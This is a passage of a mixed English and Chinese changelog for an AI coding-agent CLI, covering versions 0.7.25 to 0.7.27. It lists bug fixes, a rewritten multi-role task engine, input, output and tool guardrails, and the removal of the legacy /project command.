+ - **Scout/Generator PARALLEL CHILD AGENTS rule — single readOnly child dispatch re-enabled for heavy investigations**. Previously a categorical "NEVER dispatch exactly 1 child" rule blocked the case where one investigation's raw volume would crowd parent context. The rule is now a 3-branch decision tree (A — 2+ independent threads → per-thread fan-out; B — one investigation whose raw volume would crowd parent context AND only needs a summary → single readOnly child; C — small targets known + single-round → in-place parallel tool calls). `buildManagedReasoningPlan` also now builds a prompt-only heuristic fallback plan when provider resolution throws, so `chainPromptContext` stays populated and downstream role prompts keep the v0.7.22-parity context instead of falling back to minimal SCOUT_INSTRUCTIONS_FALLBACK.
623
+ - **Windows `.exe` `repointel` bin invocation failed with "not recognized as an internal or external command"** (latent since v0.7.15 per `quoteWindowsCmdArg`'s introduction; exposed now because the FEATURE_086 parity restore above reinstates the per-turn repo-intel probe on the Runner-driven path). `executePremiumBinCommand` and `warmPremiumViaBin` routed Windows bins through `cmd.exe /d /s /c "<quotedBin> <cmd> <quotedPayload>"`. Node's Windows argument escaping wraps the `/c` payload in outer quotes, which combined with `quoteWindowsCmdArg`'s inner quotes produced `\"C:\...\"` pairs that cmd's `/s` strip-rule could not undo — cmd tried to execute the literal `\"C:\Tools\...\repointel.exe\"` as a single command name and failed. Symptom: `/repointel status` reported `status=unavailable, fallback=oss` even when the daemon was already listening at the configured endpoint; `buildAutoRepoIntelligenceContext` silently fell back to the OSS baseline on every turn.
624
+ - Fix 1 — **`windowsBinNeedsShell(extension)` predicate** gates the `cmd.exe` branch. Only `.bat` / `.cmd` launchers still go through the shell; `.exe` / `.com` and bare PATH names execute directly via `execFile`, whose CreateProcess-backed quoting handles spaces and special characters natively. Applied symmetrically to `executePremiumBinCommand` and `runPremiumBinSubcommand` (renamed from `warmPremiumViaBin`, now parameterized over `'warm' | 'daemon'` so the same dispatcher can spawn SEA native daemons).
625
+ - Fix 2 — **`ensurePremiumDaemonReady(bin, endpoint)` defense-in-depth**: HTTP-probes `<endpoint>/rpc` with a `status` command before touching the bin. If the daemon is already running the bin is never invoked, which also side-steps any remaining shell-quoting quirk on unusual bin paths. Falls back to `bin warm` → `bin daemon` (for SEA native binaries whose `warm` runs in direct mode without spawning a daemon) → poll endpoint at 150ms intervals until answered or the 2s deadline elapses. `warmRepoIntelligenceRuntime` and `callPremiumDaemon` route through it; contract / build-id mismatch branches continue to use `warmPremiumViaBin` alone since `tryRecycleStaleDaemon` expects the CLI path.
626
+ - Regression test in `premium-client.test.ts` covers the "fetch failed + bin subcommands exited cleanly but daemon still unreachable" case to pin `ensurePremiumDaemonReady`'s null-return contract.
627
+ - **First-turn `refresh: true` preturn deterministically fell back to OSS** on medium repos (~800 source files). The daemon rebuilds its semantic index when `refresh: true` is set; on this author's `KodaX` repo the rebuild takes ~10.5s, but `PREMIUM_REQUEST_TIMEOUT_MS` was capped at 4s for all commands. The fetch aborted with `AbortError` → outer catch wrote `premiumFailureCache` → every subsequent call within the 2s TTL was short-circuited to `null` → the entire new session landed on OSS fallback despite a perfectly healthy daemon. `/repointel status` (which goes through `executePremiumBinCommand`, a separate path) still reported `status=ok, transport=daemon`, making the symptom hard to diagnose.
628
+ - Fix 1 — **layered fetch timeout**. New constant `PREMIUM_REFRESH_TIMEOUT_MS = 30_000`; `selectRequestTimeoutMs(request)` picks the 30s budget when `payload.refresh === true` and keeps the 4s budget for hot-path requests.
629
+ - Fix 2 — **transient-timeout cache guard**. New `isTransientTimeoutError(error)` recognises `AbortError` / `TimeoutError` / `aborted` / `timeout` messages (with recursive `cause` walk to cover undici's wrapped errors). `callPremiumDaemon`'s outer catch suppresses `rememberPremiumFailure` when the error is transient, so a single slow call cannot poison the cache for the following 2s window. Structural failures (bin missing, contract mismatch, daemon-reported `status: 'unavailable'`, build mismatch) continue to poison the cache to suppress spam.
630
+ - Regression test in `premium-client.test.ts` covers the two-phase "first call aborts, second call succeeds" scenario — under v0.7.26 the second call would have been cache-skipped and returned `null`; under the new guard it reaches fetch and succeeds.
631
+ - **Third-party Qwen-compat gateways returning `400 System message must at the begin`** after a few rounds. After compaction, lineage injects `[compaction-summary, post-compact-ledger, post-compact-file-content, ...]` as contiguous `role:'system'` entries at the start of the transcript. Under v0.7.26 the Runner-driven LLM adapter took only `messages[0]` as the system prompt (legacy assumption: exactly one leading system entry), left the rest as mid-transcript system messages, and the OpenAI-compat provider then also prepended its own `{ role: 'system' }`. Strict Qwen proxies reject any non-leading system message, and the wire ended up with 2-4 system entries interleaved.
632
+ - Fix 1 — **`buildRunnerLlmAdapter` merges every leading contiguous system entry** (not just `messages[0]`) into the adapter-level `system` parameter, so agent role instructions, compaction summary, and post-compact attachments collapse into one string; the transcript that the provider sees starts cleanly at the first user/assistant turn.
633
+ - Fix 2 — **`KodaXOpenAICompatProvider.normalizeSystemForWire` collapses every `role:'system'` on the wire** (the `system` parameter plus any system message the adapter didn't catch) into a single top-of-wire system content, defence-in-depth for any caller path that might still slip a second system through.
634
+ - Fix 3 — **v0.7.22 parity: `cleanupIncompleteToolCalls` + `validateAndFixToolHistory` re-enabled at the adapter level** (legacy `agent.ts` called these before every provider request; Runner-driven path had dropped them). Prevents orphaned `tool_use` → `tool_result` pairs that would otherwise produce the `"Cleaned incomplete tool calls"` post-trim at the same proxies.
635
+ - Regression test in `runner-driven.test.ts` covers the "3 contiguous leading system messages merge into one" case plus the tool-history sanitization path.
636
+ - `/mode` autocomplete now ranks exact command prefix above fuzzy substring.
637
+ - REPL altScreen flicker on SSH / Windows ConPTY eliminated by merging `log.clear() + log()` into a single `log.clearAndRender()` call (stop-gap while FEATURE_057 Track F / FEATURE_096 land the proper host-downgrade policy).
638
+
639
+ ### Changed
640
+
641
+ - **FEATURE_086 子任务 B 第 5 条 — shared YAML frontmatter helpers extracted to `@kodax/skills/shared/yaml`**. `sanitizeYaml` / `normalizeHooks` / `parseYamlFrontmatter` / `normalizeAllowedToolsString` / `normalizeYamlHookEntry` / `normalizeYamlHookEntryList` / `normalizeYamlHookMap` lived as duplicate copies in `packages/skills/src/skill-loader.ts` and `packages/repl/src/commands/discovery.ts`. Unified to a single source under `packages/skills/src/shared/yaml.ts`; `package.json` adds the `"./shared/yaml"` subpath export; `vitest.config.ts` aliases the subpath (placed before `@kodax/skills` for prefix precedence). Behaviour identical.
642
+ - **FEATURE_086 子任务 B 第 6 条 — Provider config / snapshot dedup via `buildProviderConfig` helper**. `KODAX_PROVIDER_SNAPSHOTS` is now the single source of truth for `apiKeyEnv`, `model`, and `reasoningCapability`. Each of the 9 built-in Provider classes derives those three fields via `buildProviderConfig(name, extras)` so the class config and the snapshot cannot drift out of sync. `ProviderSnapshot` type + `KODAX_PROVIDER_SNAPSHOTS` const moved above the class definitions to avoid forward-reference gymnastics. Net -6 lines; no behaviour change.
643
+ - **FEATURE_086 子任务 B 第 7 条 — Lazy-singleton built-in providers with env-aware invalidation**. `getProvider(name)` no longer constructs a fresh SDK client (`new Anthropic({...})`, `new OpenAI({...})`) on every call. The `builtinProviderCache` keys on both provider name and current `*_API_KEY` env value so tests that mutate env between cases still see fresh clients. New `resetBuiltinProviderCache()` export for explicit test isolation.
644
+
645
+ ### Removed
646
+
647
+ - **FEATURE_086 子任务 B 第 3 条 — `/project` 命令整块删除**(FEATURE_054 目标达成并归档;AMA Scout-first via `--agent-mode ama` 自 FEATURE_061 起已完整覆盖。此前版本 /project 与 AMA 并存,本版本只剩 AMA 作为项目级工作流入口)
648
+ - **破坏性变更**:CLI flag(`--init` / `--append` / `--overwrite` / `--auto-continue` / `--max-sessions` / `--max-hours`)+ 公开 API(`ProjectStorage` / `ProjectFeature` / `ProjectState` / `ProjectStatistics` / `FeatureList` / `calculateStatistics` / `getNextPendingIndex` / `isAllCompleted` / `handleProjectCommand` / `detectAndShowProjectHint` / `buildInitPrompt` / `getFeatureProgress` / `checkAllFeaturesComplete`)+ REPL 命令 `/project *` 全部不可用;未升级到 AMA 的下游代码需在 v0.7.27 前迁移
649
+ - **迁移路径**:
650
+ - `kodax --init "..."` / `kodax --auto-continue` → `kodax --agent-mode ama "..."`(Scout 自动路由 H0/H1/H2)
651
+ - `/project brainstorm` / `/project plan` / `/project next` / `/project auto` → AMA 内置 Planner 自动吸收 brainstorm + plan + execute 流程
652
+ - `feature_list.json` / `PROGRESS.md` 手工维护 → AMA 内部 evidence bundle + managed-task 归档(`.agent/managed-tasks/`)
653
+ - **实际删除清单**(Commits A→D,净 −12,000+ 行):
654
+ - **Commit A(Layer 6 heuristics)**:`packages/coding/src/prompts/long-running.ts`(LONG_RUNNING_PROMPT),`detectLongRunningProjectContext` / `getLongRunningContext` / `harness: 'project'` hint path,`'Project harness'` /provider 场景
655
+ - **Commit B(Layer 4+5 CLI surface)**:`src/kodax_cli.ts` 6 个 flag 注册与 help 文案,`src/cli_option_helpers.ts` 的 `init` / `append` / `overwrite` / `autoContinue` / `maxSessions` / `maxHours` 字段与 `parseNonNegativeIntWithFallback` / `parsePositiveNumberWithFallback` helper,`packages/repl/src/common/utils.ts` 的 `buildInitPrompt` / `getFeatureProgress` / `checkAllFeaturesComplete` / `readFeatureProgressSnapshot`
656
+ - **Commit C(Layer 0-3 module)**:`packages/repl/src/interactive/project-{brainstorm,commands,harness,harness-core,harness-types,planner,quality,state,storage,workflow}.ts`(10 个)+ 对应 `*.test.ts`(9 个)+ `commands-project-shim.test.ts` + `completers/project-completer.ts`;barrel 再导出全量清理(`packages/repl/src/interactive/index.ts` / `packages/repl/src/index.ts` / `src/index.ts`);`commands.ts` 的 `LEGACY_PROJECT_COMMAND_NAMES` / `printProjectMigrationGuidance` stub + 两处 call sites;`completers/command-arguments.ts` 的 `PROJECT_ARGS` 死常量;`json-guards.ts` 的 `isFeatureList` / `isProjectFeature` / `isProjectWorkflowState` / `isProjectControlState` / `isBrainstormSession` + 配套常量;`repl.ts` + `InkREPL.tsx` 的 `result.projectInitPrompt` 分支;`CommandResult` / `CommandResultData` 类型字段;`KodaXTaskSurface` 收紧为 `'cli' | 'repl' | 'plan'`,`getManagedTaskWorkspaceRoot` 的 `.agent/project/managed-tasks/` 分支合并至 `.agent/managed-tasks/`
657
+ - **Commit D(尾清理 + 文档)**:`KODAX_FEATURES_FILE` / `KODAX_PROGRESS_FILE` 两个 orphan 常量;README / README_CN / packages/coding/README.md 的 Project Mode 章节与公开 API 示例;`docs/FEATURE_LIST.md` FEATURE_054 scope 归档
658
+ - **FEATURE_054 归档**:v0.7.27 之前 FEATURE_054 的目标是"把 /project 吸收进 AMA H2"。实际执行中发现 AMA 自 FEATURE_061 起已完整覆盖 /project 功能面,"吸收"任务转为直接"删除",FEATURE_054 随本版归零
659
+ - **FEATURE_086 子任务 B 第 2 条 — `--team` CLI flag 彻底移除**(ADR-017 定废;FEATURE_027 自 v0.7.10 起已用 `--agent-mode ama|sa` 替代;此前只是 sunset handler 软下架)
660
+ - `src/kodax_cli.ts`:删除 commander `.option('--team <tasks>', ...)` 注册、`team` help topic 对象、help 索引行、全局 help 行、help topics 字符串、bash completion 字符串里的 `--team`、`opts.team` 传递、sunset handler block
661
+ - `src/cli_option_helpers.ts`:删除 `CliOptions.team?: string` 字段 + `validateCliModeSelection` 的 json-mode guard 里的 `|| cliOptions.team` 条件
662
+ - `tests/kodax_cli.test.ts`:`should document provider and team caveats` 改名为 `provider and project caveats`,移除 team 文案断言,加 `not.toContain('--team')` 作为负向守卫
663
+ - 用户可观察行为变化:`kodax --team xxx` 从 "[Deprecated] --team has been sunset" 错误 → commander 原生 `error: unknown option '--team'`(两者都 exit 1,后者带 "Did you mean ...?" 建议,对用户更友好)
664
+ - `README.md`:删除 `--team <tasks>` 的 CLI options 行;`--team "..."` 示例改为 `--agent-mode ama "..."` 等价示例,保留多 agent 并行的展示意图
665
+ - `docs/test-guides/GENERAL_v0.5.20_TEST_GUIDE.md`:顶端加归档提示,说明 `--team` / Agent Team 相关 TC 随 v0.7.27 失效,替代入口为 `--agent-mode ama`
666
+ - 勘误同步:`docs/features/v0.7.27.md` 里 FEATURE_086 子任务 B 第 2 条的文字更正 —— v1 设计稿误以为"CLI flag 已从 `src/**/*.ts` 移除,本版只清 config.json 残留",实际 CLI flag 完整在 src 里,config.json 从来没有 `team` 字段
667
+ - **FEATURE_086 子任务 B 第 1 条 — `compactMessages()` 及相关常量移除**(v0.7.23 已标 `@deprecated`,计划于 v0.7.27 移除)
668
+ - 删除 `packages/agent/src/messages.ts`(函数定义)
669
+ - 从 `@kodax/agent` / `@kodax/coding` 的 public export 移除 `compactMessages`
670
+ - 同步移除孤儿常量 `KODAX_COMPACT_THRESHOLD` / `KODAX_COMPACT_KEEP_RECENT`(仅被原函数使用,新机制的等价配置在 `DefaultSummaryCompactionOptions` 的 `thresholdRatio` / `keepRecent` 字段)
671
+ - 迁移指南:coding preset 使用 `@kodax/session-lineage` 的 `LineageCompaction`(保留 FEATURE_072 post-compact reconstruction);通用 agent 使用 `@kodax/core` 的 `DefaultSummaryCompaction`。两者共享 `CompactionPolicy` 接口(FEATURE_081, v0.7.23)
672
+ - 安全保障:`packages/core/src/compaction.test.ts` (16 tests) + `packages/session-lineage/src/compaction.test.ts` (5 tests) 覆盖新路径;生产 compaction 自 v0.7.26 已走 Runner-driven `compactionHook`
673
+ - 文档同步:`README.md` / `packages/agent/README.md` 的代码示例从 `compactMessages` 改为 `DefaultSummaryCompaction`;`docs/test-guides/FEATURE_010_v0.5.3_PHASE3_AGENT_PACKAGE_TEST_GUIDE.md` 加顶端归档提示
674
+
675
+ ---
676
+
677
+ ## [0.7.26] - 2026-04-23
678
+
679
+ ### Added
680
+ - **FEATURE_084 — Task Engine Phase 2: Scout/Generator/Evaluator rewritten on Layer A Runner primitives**
681
+ - New `packages/coding/src/task-engine/runner-driven.ts` (2545 LoC) replaces the legacy `runManagedTask` state machine; dispatch gated via `KODAX_MANAGED_TASK_RUNTIME=runner` env flag (Shard 5a/5b), then flipped to default and legacy AMA orchestration deleted (Shard 6d-a/6d-b).
682
+ - Scout / Planner / Generator / Evaluator re-expressed as `Agent` instances with `Handoff` topology (`buildRunnerAgentChain`). H0/H1/H2 state machine now encoded as declarative continuation handoffs.
683
+ - fenced-block text protocol replaced by tool-call structured protocol (absorbs FEATURE_059 dual-track `visibleText + protocolPayload` goal): `emit_scout_verdict` / `emit_contract` / `emit_handoff` / `emit_verdict` runnable tools in `packages/coding/src/agents/protocol-emitters.ts`, Zod-validated payloads.
684
+ - Shard 6a: observer events + full `managedTask` payload parity (`ObserverBridge`).
685
+ - Shard 6b: real budget tracking (`ManagedTaskBudgetController`, per-harness caps + 90% approval dialog) + mutation tracker wiring (`wrapGenerator{Bash,Write}WithMutationGuard`).
686
+ - Shard 6c: checkpoint detection + per-role crash-safe write (FEATURE_071 parity); `--continue` path reads checkpoint and prompts user.
687
+ - Shard 6d-c: observer / stream / budget-extension parity fixes vs legacy.
688
+ - Shard 6d-d: `onIterationEnd` + `contextTokenSnapshot` parity.
689
+ - Shard 6d-e: `session.initialMessages` pass-through so REPL multi-turn / resume / plan-mode replay see full prior context.
690
+ - Shard 6d-f: role-scoped tool boundaries + evaluator shell mutation guard (`wrapReadOnlyBash`).
691
+ - Shard 6d-g..Q: Runner-driven v0.7.22 parity — `promptOverlay` stitching, Scout suspicious-completion detection, `dispatch_child_task` role wrappers with write-worktree path registration for Evaluator diff injection (FEATURE_067 v2 parity).
692
+ - Shard 6d-S: `taskVerification.runtime` surfaced into Evaluator instructions (startup command, ready signal, UI/API/DB checks) so Evaluator actively probes runtime rather than writing verdict from static reads.
693
+ - Shard 6d-T: dynamic Generator / Evaluator instructions so Scout's skillMap obligations reach the executing/verifying model.
694
+ - **FEATURE_085 — Guardrail tri-layer runtime (Input / Output / Tool)**
695
+ - `@kodax/core/src/guardrail.ts`: `InputGuardrail` / `OutputGuardrail` / `ToolGuardrail` with 4 verdict actions (allow / rewrite / block / escalate); `GuardrailBlockedError` / `GuardrailEscalateError`; `GuardrailSpan` emission.
696
+ - `Runner` wires 3 hook points — input (before first turn), output (before return), tool before+after (around every invocation); `agent.guardrails` + `opts.guardrails` merged.
697
+ - `packages/coding/src/tools/tool-result-truncation-guardrail.ts`: adapter wrapping existing `applyToolResultGuardrail` as `ToolGuardrail.afterTool` with byte-equivalent parity.
698
+ - **max_tokens escalation + continuation ladder** (implementation-time absorption, no separate feature id): `@kodax/ai` exports `KODAX_ESCALATED_MAX_OUTPUT_TOKENS`; Runner adapter auto-continues on `stop_reason === 'max_tokens'` and escalates the ceiling after N continuations; Scout parity so Scout's recon isn't silently truncated; `kimi-code` provider aligned to coding-provider capped-budget ladder.
699
+ - **`multi_edit` tool** — apply N exact-or-normalized-text replacements to a single file in one tool call. Edits apply sequentially (each edit sees the result of the previous one) and the whole batch is ATOMIC — any single failing `old_string` aborts the batch with no partial disk writes. Makes the "write skeleton + N edits" workflow cheap enough to be the default rather than a grudging fallback, removing the incentive for LLMs to fall back to "run Python to generate files". Description carries an explicit ANCHOR WARNING so models avoid anchor-consumed mistakes upfront, and a dedicated diagnostic fires when `edits[k]`'s anchor was swallowed by an earlier edit in the batch.
700
+ - **C1 fenced-block fallback parser restored on Runner-driven path** — v0.7.22's `parseManagedTaskScoutDirective` / handoff / verdict / contract fallback had been lost in the rewrite; now `attemptProtocolTextFallback` re-wires it so an LLM that forgot to call the `emit_*` tool but emitted a well-formed `kodax-task-*` fenced block still advances the state machine instead of stalling until the iteration cap.
701
+ - **H1 structural resume + post-compact reinjection (M3)** — checkpoint reload seeds the Runner-driven recorder with Scout / Contract payloads reconstructed from the saved managed-task runtime (`buildStructuralResumeSeed`), so `--continue` doesn't restart from scratch when the prior session had already committed a harness tier. Post-compaction reinjection (M3) threads recorded scout-decision / contract payloads back into the running transcript so multi-role chains survive compaction.
702
+
703
+ ### Fixed
704
+ - **Issue 119** — Scout H0→H1 upgrade no longer leaves stale pre-Scout `mutationSurface` locking Generator to docs-only writes. Post-Scout roles read Scout's own scope / reviewFilesOrAreas instead of the pre-Scout regex heuristic.
705
+ - **Issue 120** — Skill / plan-mode execution paths now route queued user inputs into the streaming prompt queue (`canQueueFollowUps` + `drainPendingInputsAsFollowUps`); previously follow-up inputs were silently dropped during skill / plan-mode execution.
706
+ - Managed-task error recovery: iteration cap raised to 500 for full multi-role chains (Core's default 20 was too low for Scout → Planner → Generator → Evaluator), budget extension dialog at 90% threshold as real throttle; `error.position` propagated through the Runner → task-engine surface.
707
+ - Classify undici `"terminated"` + cause-chain errors as retryable in `resilience/classifier.ts`; non-streaming fallback also handles `terminated`, hard-limit guard added for large `write` turns, and provider retry budget bumped for long Generator runs.
708
+ - Scout false-completion observability layer + Windows bash `cmd` trap hint.
709
+ - Write / edit prompts aligned with Claude Code multi-layer defense.
710
+ - **Scout v0.7.22 tool-set regression** — Runner-driven Scout had been stripped to a read-only subset during the rewrite; restored the full legacy tool surface (write / edit / multi_edit / exit_plan_mode + unwrapped bash so Scout can run grep/find without the docs-only wrapper firing). Scout instructions now also ship the Working-Directory / git-root / platform context so it stops `cd`-ing to invented paths.
711
+ - **H1 Scout→Generator→Evaluator infinite loop** — Scout's `confirmedHarness` is now checked in `inferScoutMutationIntent` so a mutation-intent Scout verdict correctly advances to Generator instead of bouncing between Evaluator-review and Generator-rewrite.
712
+ - **H1 same-harness unbounded revise** — `reviseCountByHarnessRef` + `H1_MAX_SAME_HARNESS_REVISES = 1` caps revises per harness tier and auto-escalates / converts when the cap is hit, preventing the "Evaluator keeps sending back, Generator keeps retrying same harness" spiral.
713
+ - **Evaluator explicit `budgetRequest` discarded** — the Runner-driven `emit_verdict` input schema now surfaces `budgetRequest` through to `maybeRequestAdditionalWorkBudget({ force: true })`, so an Evaluator's justified extension request bypasses the 90%-threshold heuristic.
714
+ - **`dispatch_child_task` child-executor lazy-load diagnostics** — lazy-loader now returns a descriptive envelope + performs export checks so cryptic "X is not a function" stalls surface the real reason (module not built / export missing) to the Evaluator instead of tripping the outer iteration cap.
715
+ - **`WRITE_ONLY_TOOLS` parity** — restored 9 Godot-specific tool names (`open_project`, `new_scene`, `set_property`, ...) that had been dropped during the Runner-driven migration, so the Evaluator read-only boundary matches v0.7.22.
716
+ - **Managed protocol multi-emit deduplication** — regression test added for the "Scout emits `emit_scout_verdict` twice in one turn" case; the recorder dedupes on `role` so the second emit is a no-op instead of triggering a handoff loop.
717
+ - **P2b write-turn `max_output_tokens` cap on RST-prone providers** — Zhipu/Kimi/MiniMax coding providers now have a 8K cap applied when the turn's tool inventory includes `write` / `edit` / `multi_edit`; prevents RST resets mid-stream. Overridable via `KODAX_RST_PRONE_PROVIDERS` and `KODAX_WRITE_TURN_MAX_TOKENS` env vars. Explicit `KODAX_MAX_OUTPUT_TOKENS` always wins.
718
+ - **`edit` / `multi_edit` error enrichment for anchor recovery** — ambiguous-match errors now include the line numbers of each duplicate (`"matched 2 places (lines 2 and 6)"` up to 3 listed, then `"and N more"`) so the LLM can see where the collisions are and widen the right one. Recovery guidance shifted from "retry with a unique anchor" to an explicit "widen old_string with nearby unique context, or set replace_all=true" + the anti-pattern warning `"(Shorter anchors match more, not fewer.)"`. Not-found errors now call out the most common cause — copying an anchor from a narrow `read` window with whitespace drift / typos — and suggest re-reading a wider window. `multi_edit`'s anchor-consumed-by-prior-edit diagnostic is retained and trimmed. `multi_edit` tool description gains a UNIQUENESS RULE paragraph ("anchor must be unique in the WHOLE current file, not just in the window you last read"). Applied symmetrically to both `edit` and `multi_edit` so the LLM gets consistent guidance from either tool.
719
+ - **REPL info items rendered in the wrong layer during managed foreground** — `onCompact`, `onProviderRateLimit`, `onScoutSuspiciousCompletion`, and queue-limit info items now route through `emitInfoItemToCorrectLayer` so they appear inline with the active managed worker's output instead of squeezed under the user prompt. Mirrors the earlier retry / provider-recovery / confirm-result fixes.
720
+ - **Pre-release review findings (HIGH-1 + MED-1..7)**:
721
+ - HIGH-1 — session transcript now records the post-input-guardrail user message (symmetric with the already-post-guardrail output side), so `--resume` / audit consumers see what the LLM actually processed on both ends.
722
+ - MED-1 — tool-before / tool-after guardrails now receive `{ ...guardrailCtx, agent: currentAgent }`; input / output guardrails keep run-scoped `startAgent` as designed.
723
+ - MED-2 — regression guards for `toolObserver.beforeTool` returning `false` / string (blocked result with default / custom message).
724
+ - MED-3 — guardrail `check` / `beforeTool` / `afterTool` exceptions now emit a `GuardrailSpan` with `decision: 'error'` + message, then re-throw (fail-loud preserved).
725
+ - MED-4 — `compactionHook` error caught and surfaced as `compaction:hook-error` child span; the run still continues (the safety contract — compaction failure must never abort — is preserved).
726
+ - MED-5 — regression guard for the L5 `max_tokens` continuation break at `KODAX_MAX_MAXTOKENS_RETRIES`.
727
+ - MED-6 — `emitInfoItemToCorrectLayer` JSDoc + mirror comment at `addHistoryItem` import lock in the "info items during managed foreground MUST route through the layer-aware emitter" rule.
728
+ - MED-7 — 4 regression guards pin the `maybeApplyP2bWriteTurnCap` multi-turn / idempotence / L4-escalation-leak contract.
729
+
730
+ ### Changed
731
+ - Legacy `runManagedTask` orchestration (~7343 LoC in `task-engine.ts`) removed; `task-engine.ts` reduced to a thin facade re-exporting the Runner-driven path.
732
+ - AMA prompt builder restored into the Runner-driven path: `_internal/managed-task/role-prompt.ts` ports v0.7.22 `createRolePrompt` 1:1, closing the earlier prompt-surface gap. Full decision / contract / metadata / verification / tool-policy / evidence-strategy / dispatch / H0/H1/H2 quality framework / handoff-verdict-contract specs reach every role turn via `RolePromptContextFactory`.
733
+ - v0.7.26 parity restoration (5-commit sweep before release): sanitize pipeline re-added with 22 unit tests; `onToolCall` / `onToolResult` / `onToolProgress` events fire from core `Runner`; Anthropic extended thinking contract honoured (thinking blocks preserved in assistant history); 6 more gaps closed (iteration cap, cost tracker, budget extension, guardrail wrapper, dead code, stale comments); tool-result-truncation guardrail wired; multimodal input artifacts reach Scout turn (C1); dispatch-child-task parallel fan-out + progress events restored (C2); session snapshot persisted at success + error terminals (C3); **skill artifacts written + role prompts quote stable filesystem paths (C4)**; verification-only roles (Scout / Evaluator) shell boundary now a superset of legacy `SHELL_WRITE_PATTERNS` (PowerShell verbs, del / touch / mkdir / rmdir, sed -i / perl -pi / python -c / node -e, plus v0.7.26 safety extensions for chmod / chown / git / package-manager installs). JSON output mode surfaces `onToolProgress` / `onManagedTaskStatus` / `onScoutSuspiciousCompletion`.
734
+ - **Kimi K2.6 promoted to default** on `kimi-code` and `kimi` providers (replaces the earlier K2 default); aligns the coding capped-budget ladder with the richer model's token ceilings.
735
+ - **REPL info rendering** now uniformly routes through `emitInfoItemToCorrectLayer` whenever a managed worker owns the foreground turn (compact notices, provider rate-limit banners, Scout suspicious-completion hints, queue-limit notices). Eliminates the "info item squeezed under user prompt instead of inline with active worker output" bug.
736
+
737
+ ### Removed
738
+ - `packages/coding/src/task-engine/_internal/prompts/{role-prompt,role-prompt-types,role-agent,runtime-execution-guide,tool-policy}.ts` — inlined or migrated to `_internal/managed-task/{tool-policy,scout-signals,repo-intelligence,artifacts}.ts` + `runner-driven.ts`.
739
+ - `packages/coding/src/task-engine/_internal/protocol/{parse-helpers,sanitize}.ts` — obsoleted by Zod-validated emit tools; fenced-block parsing + control-plane marker stripping no longer needed.
740
+ - `packages/coding/src/task-engine/_internal/formatting.ts` — pure string builders inlined into instruction / block renderers.
741
+ - `packages/coding/src/managed-protocol-handoff.test.ts` (786 LoC) — coverage replaced by `runner-driven.test.ts` (2285 LoC) + `agents/protocol-emitters.test.ts` (278 LoC).
742
+
743
+ ### Documentation
744
+ - `config.example.jsonc` template rebuilt — restored missing fields (`customProviders`, `providerModels`, `providerReasoningOverrides`, `mcpServers`, `extensions`, `agentMode`, `locale`, `thinking`, `streamIdleTimeoutMs`, `alwaysAllowTools`, full `compaction` block); removed stale `parallel` block and the misleading `permissionMode: "auto"` hint.
745
+ - **FEATURE_094 (P2d anti-escape guardrail) staged** for v0.7.36 — design captured in `docs/features/v0.7.36.md`; implementation deferred past v0.7.26.
746
+
747
+ ### Test Status
748
+ - `packages/coding`: 763+/764+ pass (1 Windows-only bash-background test flakes on tmp-dir EBUSY under parallel execution; passes in isolation). Includes 4 new regression guards for `edit` / `multi_edit` ambiguous-match line-number reporting + narrow-read not-found hints.
749
+ - `packages/core`: 86/86 pass (Runner / tool loop / handoff / Guardrail including MED-3 error-span regression + MED-1 handoff agent-ctx + HIGH-1 session symmetry, Agent / Session / Compaction)
750
+ - `packages/tracing`: 15/15 pass
751
+ - `packages/repl`: 830+ pass (no regressions)
752
+ - Full monorepo build green (`tsc -b` passes)
753
+
754
+ ---
755
+
756
+ ## [0.7.25] - 2026-04-21
757
+
758
+ ### Added
759
+ - **FEATURE_076 — Managed Task Round Boundary (User Conversation Preservation)**: `runManagedTask` now normalizes its exit across all 6 paths (SA / H0 / H1 / H2 / resume / fork) via a single `reshapeToUserConversation` seam, so `context.messages` always comes back as a clean `{user, assistant}` dialog instead of worker execution trace (Scout role-prompt-wrapped user, Evaluator isolated session, etc.). Fixes multi-turn conversation incoherence, token-meter snap-downs after H1/H2 completion, Scout role-prompt boilerplate leaking into next round, and session-persistence pollution.
760
+ - Q1 **unconverged detection**: reuses the existing `KodaXTaskStatus` enum (`isUnconvergedVerdict`). `running` / `planned` fall back to the raw trace; `completed` / `blocked` / `failed` reshape (blocked reason / error message IS a valid user-facing answer). Zero new field on `KodaXResult`; no string matching on placeholder summaries.
761
+ - Q2 **token snapshot**: full `recomputeContextTokenSnapshot` (drops stale usage; preserves only the source tag) replaces the partial-rebase approach, eliminating the drift class behind token-meter bugs.
762
+ - Q3 **fork mode integration**: InkREPL fork path now pushes the user fork prompt into `context.messages` before the assistant turn, matching the other 5 paths.
763
+ - Q4 **load-time normalization**: `normalizeLoadedSessionMessages` drops trailing role-prompt-shaped worker pairs when loading pre-v0.7.25 sessions, so `/load-session` + follow-up no longer inherits Evaluator/Scout role-prompt pollution. Regex anchored at message start to avoid false positives on casual "You are..." text.
764
+ - CLI REPL consumer update: both artifact-ledger call sites prefer `result.artifactLedger` with a messages-walk fallback; `KodaXResult` gains an optional `artifactLedger` field populated by the reshape.
765
+ - **FEATURE_058 — Transcript Native Scrollback Dump** (moved up from v0.8.0): transcript-mode `s` keybinding exits the alternate-screen, writes a plain-text serialization of the current transcript view into the terminal's native scrollback, then re-enters the fullscreen surface (renderer repaints from React state on re-entry; no content restoration needed). Serializer strips ANSI escape sequences (CSI / OSC / 2-byte ESC), skips internal `thinking` items, summarizes tool groups one line per call. Footer hint shows `s dump` in the default transcript variant only. Reuses FEATURE_051 substrate — no new primitives.
766
+ - **FEATURE_075 — Plan Approval Dialog Scroll**: two-layer defense against oversized plans.
767
+ - LLM-first constraint: `exit_plan_mode` tool schema now requires "at most 40 lines total, 3 bullet-depth levels, one sentence per bullet; otherwise split into phases".
768
+ - Mechanical fallback: `DialogSurface.PlanScrollPanel` renders the full plan in a 15-line viewport with local scroll state + `useInput` for arrow keys / PgUp / PgDn. Approval buttons stay pinned. Scope-trimmed per review: dropped the originally planned `$EDITOR` integration and markdown rendering (no evidence of demand / YAGNI).
769
+ - Confirmed `FEATURE_051 — Host-Aware Fullscreen TUI Substrate and Transcript UX` release: code-complete since v0.7.25 planning cycle, ships as part of this release.
770
+
771
+ ### Changed
772
+ - `buildToolConfirmationDisplay("exit_plan_mode", …)` no longer head+tail truncates the plan. Readline consumers get the full plan as `details` (native terminal scroll handles it); InkREPL reads `input.plan` as `planContent` and renders via `PlanScrollPanel`, stripping the plan lines out of the single-line confirm prompt to avoid double-rendering.
773
+ - `KodaXResult.artifactLedger?: readonly KodaXSessionArtifactLedgerEntry[]` — new optional field pre-populated by the FEATURE_076 reshape so downstream consumers do not have to walk the post-reshape `messages` for tool_result blocks.
774
+
775
+ ### Removed
776
